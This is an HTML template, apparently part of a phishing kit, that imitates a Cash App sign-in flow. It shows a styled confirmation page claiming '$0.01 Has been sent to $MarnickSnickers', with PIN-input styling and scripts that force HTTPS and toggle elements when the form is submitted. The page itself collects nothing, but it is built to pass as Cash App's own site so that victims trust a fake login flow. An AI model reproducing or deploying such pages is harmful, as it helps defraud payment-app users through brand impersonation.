<!DOCTYPE html>
<html lang="en">
<head>
          <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<link type="text/css" rel="stylesheet" href="{{url_for('static', filename='cashapp/css/style.css')}}"/>

  <meta charset="UTF-8">
  <title>Cash App - Sign in to your account</title>

    <style>
input.pin{
width: 32px;
height: 32px;
border-color: white;
outline: none;
border-width: 3px;
font-family: myFirstFont;
color: white;
font-size: 20px;
border-style: solid;
border-radius: 32px;
text-align: center;
background-color: #0bb634;
margin: 26px;
}
img.clear-background{
filter: saturate(10%);

}
h1 {
  font-family: myFirstFont;
  color: white;
}
h3 {
  font-family: myFirstFont;
  color: white;
}
    </style>

</head>
<body>

<form action="#" method="post" id="cashapplogin">
<center><h2>Thank you!</h2></center>
<br>
    <center><h1>$0.01</h1><br>
        <h3>Has been sent to $MarnickSnickers</h3>


    </center>

</form>

   <script>

var loc = window.location.href+'';
if (loc.indexOf('http://')==0){
    window.location.href = loc.replace('http://','https://');
}
   </script>
<script>
$(".hide").hide();
$("#cashapplogin").on("submit", function(){
     $(".hide").show();
     $(".show").hide();
});

</script>
         <script>
            function clickEvent(first,last){
			if(first.value.length){
				document.getElementById(last).focus();
			}
		}
         </script>
</body>
</html>